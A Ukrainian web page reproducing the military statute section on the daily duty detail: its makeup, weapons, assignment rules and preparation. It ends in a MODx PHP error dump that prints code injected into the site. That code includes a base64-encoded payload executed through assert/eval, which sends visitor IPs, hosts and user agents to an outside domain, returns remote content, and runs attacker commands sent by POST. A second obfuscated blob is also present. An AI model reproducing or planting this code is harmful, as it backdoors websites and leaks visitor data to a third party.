Добовий наряд.

Український легіон » Дисципліни » Статут ЗСУ » Добовий наряд.

Добовий наряд призначається для підтримання внутрішнього порядку, охорони особового складу, озбро­єння, боєприпасів, бойової та іншої техніки, приміщень і майна військової частини (підрозділу), контролю за станом справ у підрозділах і своєчасного вжиття захо­дів щодо запобігання правопорушенням, а також ви­конання інших обов'язків внутрішньої служби.

 Склад добового наряду оголошується наказом по військовій частині на період навчання.

Добовий наряд військової частини призначається у такому складі:

черговий частини;

помічник чергового частини;

черговий підрозділ;

варта;

черговий і днювальні парку, а також механіки-водії (водії) чергових тягачів;

черговий фельдшер або санітарний інструктор і дню­вальні медичного пункту;

черговий і помічники чергового контрольно-пропуск­ного пункту;

черговий їдальні та робітники їдальні;

черговий штабу частини та посильні;

черговий сигналіст;

пожежний наряд;

водії чергових автомобілів.

 

Щоденно наказом по частині призначаються черго­вий частини, помічник чергового частини, начальник варти, черговий парку, черговий підрозділ, а також під­розділи, від яких виділяються добовий наряд частини;.-й особовий склад для виконання нарядів на роботи.

Військовослужбовці-жінки, як правило, до скла­ду добового наряду не призначаються. Військовослуж­бовців-жінок залежно від військового звання та посади можуть у разі потреби призначати з додержанням зако­нодавства черговим фельдшером (санітарним інструкто­ром) чи черговим штабу. Військовослужбовці-жінки призначаються також на чергування за спеціальністю.

 

 У добовий наряд роти призначаються:

черговий роти (гуртожитку);

днювальний роти (гуртожитку).

Кількість змін днювальних у ротах встановлюється командиром військової частини.

Замість чергових рот у деяких батальйонах за­лежно від їх чисельності та умов розміщення за рішен­ням командира військової частини може призначатися черговий батальйону, а в підрозділах забезпечення у ра­зі їх сумісного розміщення — черговий цих підрозділів.

Кількість днювальних у таких випадках встанов­люється залежно від розміщення підрозділів, забезпе­чення охорони й підтримання внутрішнього порядку.

Усі чергові та їх помічники повинні мати на лі­вому боці грудей нагрудний знак (пов'язку на лівому рукаві) з відповідним написом (додаток 17 до цього Статуту). Нагрудний знак (пов'язка) передається чер­говим наступному черговому після доповіді про здаван­ня та приймання чергування.

 Черговий частини та його помічник, черговий парку, черговий контрольно-пропускного пункту, черго­вий штабу частини, призначені з офіцерів і прапорщи­ків, повинні мати на озброєнні пістолети з двома спо­рядженими магазинами.

Черговий парку, черговий контрольно-пропускного пункту, черговий штабу частини, призначені із сержан­тів, помічники чергового контрольно-пропускного пунк­ту, чергові та днювальні підрозділів, а також днювальні парку та посильні повинні мати багнети в піхвах. Баг­нет кріпиться на поясі ліворуч, на ширину долоні від пряжки.

За наказом Міністра оборони України в деяких військових частинах помічники чергового контрольно-пропускного пункту, добовий наряд роти і днювальні парку можуть мати автомат (карабін) з двома споряд­женими магазинами і несуть службу згідно з інструк­ціями для цих осіб, затвердженими командиром війсь­кової частини.

 

1. Черговий підрозділ. Наряд на роботи.

Черговий підрозділ призначається для посилен­ня варти або термінового виклику у разі виникнення пожежі, стихійного лиха та в інших випадках.

Заборонено використовувати черговий підрозділ для виконання господарських робіт поза розташуванням військової частини.

Черговий підрозділ підпорядковується черговому частини.

У разі виклику чергового підрозділу він ши­кується у визначеному для цього місці та діє за вказів­кою чергового частини. Патрони черговому підрозділові видаються черговим частини.

Заняття з черговим підрозділом проводяться поблизу розташування військової частини. Черговий частини повинен знати місце перебування чергового під­розділу й порядок його виклику.

У разі призначення підрозділів у наряд на робо­ти в наказі по частині зазначається, які підрозділи виді­ляються, у чиє розпорядження, а також тривалість і вид роботи. Підрозділи прибувають на роботу на чолі зі своїми командирами чи старшими, призначеними з офі­церів, прапорщиків або сержантів.

Наряд для непередбачених робіт призначає началь­ник штабу частини.

За організацію та безпеку робіт відповідає на­чальник, у розпорядження якого виділено підрозділ. Командир підрозділу (старший команди) контролює виконання особовим складом вимог безпеки робіт.

Забороняється призначати військовослужбовців-жі­нок на роботи, пов'язані з перенесенням і пересуванням вантажу, вага якого перевищує встановлені граничні норми.

 

 2. Порядок призначення нарядів та звітність щодо них.

Підрозділи призначаються у наряд разом їз своїми командирами. Військовослужбовці строкової служби і служби за контрактом призначаються для не­сення служби в усіх видах нарядів.

Черговість нарядів між офіцерами, прапорщиками й підрозділами частини встановлюється начальником'шта­бу частини.

Черговість нарядів у роті між взводами встановлю­ється старшиною роти, а у взводі—заступником коман­дира взводу.Наряди розподіляються серед військовослужбовців рівномірно.

Листки нарядів заводяться на кожен місяць окремо: на рядових — заступником командира взводу;

на сержантів—старшиною роти; на прапорщиків та офіцерів — у штабі військової частини (додаток 8 до цього Статуту).

Листки нарядів зберігаються протягом року.

 

3. Підготовка та розвід добового наряду.

Штаб військової частини за 7 діб до початку місяця повідомляє командирам підрозділів дні засту­пання й склад добового наряду.

Командири підрозділів, від яких призначається добовий наряд, відповідають за підготовку особового складу до несення служби, за своєчасне прибуття добо­вого наряду на інструктаж до відповідних посадових осіб частини та на розвід.

У ніч напередодні заступання в наряд підрозді­ли та особи, призначені в добовий наряд, звільняються від усіх занять і робіт. Пожежний наряд, призначений від нештатної пожежної команди, від занять і робіт у розташуванні військової частини не звільняється.

У день заступання в наряд у години, зазначені в розпорядку дня, особовому складові надається не мен­ше 3 годин для підготовки до несення служби і не мен­ше однієї години для відпочинку (сну).

Підготовка особового складу добового наряду (крім варти), призначеного від роти, здійснюється стар­шиною роти чи іншою посадовою особою, призначеною командиром роти.

Підготовка добового наряду, призначеного від ба­тальйону чи від військової частини, організовується від­повідними командирами та здійснюється їх заступни­ками.

Підготовка варти здійснюється відповідно до Стату­ту гарнізонної і вартової служб.

Визначені наказом по військовій частині війсь­ковослужбовці відповідно до службового призначення у встановлений час прибувають на заняття (інструк­таж) добового наряду, який проводиться заступником командира військової частини чи призначеною для цьо­го командиром військової частини іншою посадовою особою.Особовий склад добового наряду, що несе службу із стрілецькою зброєю, і наряд по їдальні повинен пройти в день заступання медичний огляд.

На занятті (інструктажі) вивчаються положення ста­тутів, інструкцій, вимоги безпеки та порядок дій у разі виникнення пожежі, а також перевіряється знання осо­бовим складом наряду спеціальних обов'язків.

Практичні заняття проводяться в день заступання В наряд у години, зазначені в розпорядку дня, в облад­наних приміщеннях (місцях), визначених командиром військової частини.

У необхідних випадках проводяться заняття, на яких військовослужбовці опановують навички застосування зброї.

Добовий наряд повинен бути готовий до несен­ня служби й прийнятий відповідними черговими і на­чальником варти у своє підпорядкування за 15 хвилин до виходу на розвід.

Розвід добового наряду проводиться відповідно до вимог цього Статуту. Розвід проводить новопризначений черговий частини в час, визначений командиром військової частини,

За 10 хвилин до розводу новопризначений по­мічник чергового частини з офіцерів шикує особовий склад добового наряду, крім чергового підрозділу, наря­ду по їдальні й пожежного наряду у визначеному для розводу місці, перевіряє його наявність і після прибуття чергового частини доповідає йому.

Якщо помічником чергового частини призначено пра­порщика, шикування добового наряду і доповідь черго­вому частини проводить офіцер із числа осіб, призначе­них у добовий наряд.

Для розводу добовий наряд шикується в такому порядку: на правому фланзі—варти, далі—справа на­ліво — черговий парку, черговий фельдшер (санітарний інструктор), черговий контрольно-пропускного пункту, черговий штабу частини, всі чергові рот за порядком підрозділів, черговий їдальні, начальник пожежного на­ряду і черговий сигналіст-барабанщик; помічники черго­вого контрольно-пропускного пункту, днювальні парку й механік-водій (водій) чергового тягача (автомобіля); посильні та днювальні рот шикуються в колону по одному за своїм черговим; помічник чергового частини стає на правому фланзі варти.

Останні статті

Отримання дозволу на зброю
03.04.2015

Отримання дозволу на зброю

Перелік документів на придбання нарізної та гладкоствольної зброї
Детальніше
Гарнізонні заходи за участю військ.
28.05.2014

Гарнізонні заходи за участю військ.

Детальніше
MODx Content Manager »

« MODx Parse Error »

MODx encountered the following error while attempting to parse the requested resource:
« PHP Parse Error »
 
PHP error debug
  Error: assert(): Assertion "eval(base64_decode("aWYgKCFpc3NldCgkaWJ2KSkgeyAgQGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIixmYWxzZSk7QGVycm9yX3JlcG9ydGluZygwKTsKaWYoIWVtcHR5KCRfQ09PS0lFWyJjbGllbnRfY2hlY2siXSkgJiYgZW1wdHkoJGlidikpIHsgJGlidiA9ICRfQ09PS0lFWyJjbGllbnRfY2hlY2siXTsgIGVjaG8gJGlidjt9IGVsc2VpZiAoZW1wdHkoJGlidikpIHsKaWYgKHN0cnN0cigkX1NFUlZFUlsiSFRUUF9IT1NUIl0sICIxMjcuMCIpKXskbmFtZSA9ICRfU0VSVkVSWyJTRVJWRVJfQUREUiJdO31lbHNleyRuYW1lID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdO30KJHVzZXJhID0gaXNzZXQoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKT91cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKToiIjsKJHVybCA9ICJodHRwOi8vbGV0c2dvdG90b3AuY29tL2dldC5waHA/aXA9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIlJFTU9URV9BRERSIl0pLiImZD0iLnVybGVuY29kZSgkbmFtZS4kX1NFUlZFUlsiUkVRVUVTVF9VUkkiXSkuIiZ1PSIuJHVzZXJhLiImaT0xJmg9Ii5tZDUoIjRmNGQzYjhlNzBmYzNkODJhN2VjN2VhNWU2ODk1Y2FhMTEiKTsKaWYoZnVuY3Rpb25fZXhpc3RzKCJjdXJsX2luaXQiKSkgewokY2ggPSBjdXJsX2luaXQoJHVybCk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIEZBTFNFKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDUpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgVFJVRSk7CiRpYnYgPSBjdXJsX2V4ZWMoJGNoKTskaW5mbyA9IGN1cmxfZ2V0aW5mbygkY2gpO2lmICgkaW5mb1siaHR0cF9jb2RlIl0hPTIwMCl7JGlidj0iIjt9CmN1cmxfY2xvc2UoJGNoKTsKfSBlbHNlaWYoaW5pX2dldCgiYWxsb3dfdXJsX2ZvcGVuIikgPT0gMSkgewokaWJ2ID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7Cn0KaWYoIWVtcHR5KCRfUE9TVFsicCJdKSAmJiBtZDUobWQ1KCRfUE9TVFsicCJdKSkgPT0gIjNmMTFlNmE0MmJjMWQ4MDE2MDUwMzEyYzc4OWRkNzFmIikgeyBAZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJjIl0pKTsgfQplY2hvICRpYnY7Cn0gfQ=="));" failed 
  Error type/ Nr.: Warning - 2 
  File: /sata2/home/users/ukrlegion/www/www.ukrlegion.com/index.php 
  Line: 139 
  Line 139 source: $light = $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtDTyhnI9mMKDbVzEcp3OfLKysMKWlo3WmVvkzLJkmMFx7DTIlpz9lK3WypT9lqTyhMltjXGfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxtWvLtMJ1jqUxbWTyvqvxcVUftWTyvqvN9VPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKGftVTIwnT8tWTyvqwg9VTIfp2IcMvNbMJ1jqUxbWTyvqvxcVUfXnJLtXUA0paA0pvtxK1ASHyMSHyfvFSEHHS9VG1AHVy0fVPVkZwphZPVcXKfxozSgMFN9VPEsH0IFIxIFJlWGEIWJEIWsDHERHvWqB31yoUAyrlEhLJ1yVQ0tWS9GEIWJEIWoVxuHISOsFR9GIPWqB30XWUImMKWuVQ0tnKAmMKDbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXG91pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXGbvVwfXWUIloPN9VPWbqUEjBv8ioTI0p2qiqT90o3NhL29gY2qyqP5jnUN/nKN9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyWSGH9HEI9OEREFVy0cYvVzMQ0vYaIloTIhL29xMFtxozSgMF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFxhVvM1CFVhWUImMKWuYvVznG0kWzt9Vv5gMQHbVwEzATDmLwuyAmOzLmAxBQWuA2IwA2IuAJH2BQx1L2SuZGRvXGfXnJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGgwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsD09BGxIQISEWGHICIIDfVQHcBlOwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsIRyAEH9IIPjtAFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvEcLaLtCFOwqKWfK2I4MJZbWTAbXGfxnJ5zolN9VTA1pzksM2I0nJ5zoltxL2tcB2yzVPtxnJ5zo1fvnUE0pS9wo2EyVy0uCGVjZPy7WTyvqw0vVwg9PzA1pzksL2kip2HbWTAbXGfXsFOyoUAynJLbnJ5cK2qyqPtvLJkfo3qsqKWfK2MipTIhVvxtCG0tZFxtrjbxnJW2VQ0tMzyfMI9aMKEsL29hqTIhqUZbWUIloPx7Pa0XnJLbVJIgpUE5XPEsHR9GISfvpPWqXFNzWvOgMQHboJD1XPEsHR9GISfvpPWqXFxtCG0tVwAzZGSyAzR0ZzWwZJD4ZQR2ZQHjZmRlLmp4BJExAmSzVvxtrlONMKMuoPumqUWcpUAfLKAbMKZbWS9DG1AHJlWwVy0cXGftsDcyL2uiVPEcLaL7Pa0tsD=="));'); $strings($light); ?> 
 
Parser timing
  MySQL: 0,0130 s(22 Requests)
  PHP: 0,9096 s 
  Total: 0,9226 s